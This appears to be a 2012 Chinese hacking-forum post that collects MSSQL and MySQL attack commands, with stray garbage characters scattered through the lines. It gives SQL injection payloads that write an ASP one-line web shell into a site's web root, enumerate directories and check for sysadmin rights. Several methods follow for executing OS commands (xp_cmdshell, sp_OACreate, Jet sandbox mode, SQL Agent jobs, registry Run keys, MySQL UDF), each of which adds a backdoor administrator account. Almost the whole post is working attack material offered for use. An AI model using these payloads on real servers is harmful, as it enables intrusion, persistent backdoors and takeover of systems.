找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2888|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
) _, f& Q- \7 P5 u首先确定网站的WEB路径
" _9 F, Y$ x" t. m3 P;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马3 H" x6 G5 b/ t. ~1 e% ?

; P: V" G  U4 S( g;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
( u0 U8 _" c! E' g; J//将一句话木马插入表中" H+ Z; X/ |) E# n% \1 A
, ^  m% v! K5 @2 |5 n, Z
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
) C- |/ S! w% S% M7 Y6 K% I//导出一个ASP文件
9 L% I$ n& \3 }7 A
# p+ Y) D! s3 ~) J
8 X5 o: @2 q9 e- Q; M& F5 B4 Y关于MSSQL列目录1 H  l1 p& h/ s; m% ~
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
, u: p+ W+ l% |: a) }Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表. A1 o3 S3 F0 z% A& Y( h+ M- y

9 b' Q1 f% b# Z8 x+ u2 |+ v1 Hand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录; ]3 X+ G) L- o$ n
& U# c6 ]: D( b
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
6 g% S0 P6 K; q2 R! f/ m- ~' u
* A3 D: x& D. ~$ ^7 F: t# O6 a/ b% JAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
# i4 L* G7 i, L! l% }! M; a% t8 R( ]8 c7 \
% X* T8 n2 b  [$ `3 {% w/ {4 b
数据库版本和权限查看
7 W6 w9 [2 X% m) D; ^and 1=(select @@VERSION) //查看详细的数据库信息.% M& Z) F# a3 n9 N1 B) o: I. e
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
' Y4 V' S3 v; ^6 t; Jand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
: R- l9 l* o; c  `8 ?& G6 K+ ^! f0 {+ r

+ O; d  h' f, W) `* e! O) \: [1.利用xp_cmdshell执行命令
+ Q& u9 W7 h3 R7 kexec master..xp_cmdshell 'net user rfire 123456 /add'5 G' _- a  v, R3 X  t3 o( h2 v
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
  h# e6 `/ J) P) P, f: Q% ~$ I+ f% h5 x# A* g
恢复xp_cmdshell存储过程! @1 t. X; {7 \( g; }: y6 D8 t
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'% j  h* {; a- G+ w  _

# w7 k) ?* ?0 v5 m# B0 ~+ |
( Y4 V7 E4 B5 v/ a* U2.利用SP_OAcreate和SP_OAMETHOD执行命令
' n0 d7 |% b% O" V  ~在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下/ Z; _7 j4 E* Z2 W) e1 T" Y7 t
DECLARE @shell INT //建立一个@shell实体
4 I8 N+ |5 J* S  t; ]* JEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例* S% }2 ?  J& c* V) d: L
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
( a: x4 x5 M5 O( y3 l
! \, O( J$ R: |0 y' F; o8 h, s% \8 p2 G3 E/ W6 W! p
3.利用沙盒模式) |2 n8 g7 t, l( S7 W
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。6 a7 l" g2 ~' Y8 Y6 `6 R) d
开启沙盒模式:
3 P7 Y8 V3 g0 n9 C1 A. o4 Z9 L/ NEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
2 N4 h) O7 \7 ~; d# v( i9 l: h0 y9 j! B* q4 ~3 h4 J0 f
执行命令:& g, B/ u  K/ P8 |0 ~: e7 Z4 o
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
: O4 s: N1 m0 G% n  o5 p& u$ ^4 j/ m* [; z
, q& o$ Z; X4 I; [9 A- Y
4.利用SQL代理执行命令1 E! ~) C6 k0 [4 E& d; i9 F8 z
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
& c1 f* t/ w1 Z4 K' A" Q
  C: i$ z$ m) {: ?# C执行命令:
0 t' v' X1 |" |% Ruse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
/ O) `3 M0 r2 wexec sp_add_job 'x'
* v4 m. q; l+ G- gexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
, b2 ~2 [0 t3 e; p& _9 Gexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
; o9 B/ T7 p+ {. D8 P
3 w$ [5 q7 v9 F2 _: K
( C4 t! G& o; T1 L1 a/ H( t, g5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
' i% ^- g7 S2 X3 r2 gEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
. J' A9 @" s  h; l1 |3 G! U( v. I$ r6 G3 w3 o* x9 U

+ C$ Q1 y* ~3 R1 @9 v( y6.MYSQL的命令执行, ^/ ^9 O4 V7 k5 z, q
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)0 J9 Q2 k8 X7 ?$ f9 N
首先要在su.php下导出c:\windows\udf.dll6 ?) L2 ^' U7 q( N
导出后执行创建自定义函数命令:
9 Q2 k; ?7 h; w  oCreate Function cmdshell returns string soname 'udf.dll'
- B) f/ g' [/ q8 D1 v& B( X执行命令
4 B4 n* D1 r( U8 Uselect cmdshell('net user rfire 123456 /add')
9 ], Q$ L& H) b+ E) m  J执行后删除函数 drop function cmdshell
( _* |3 s! l8 h9 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表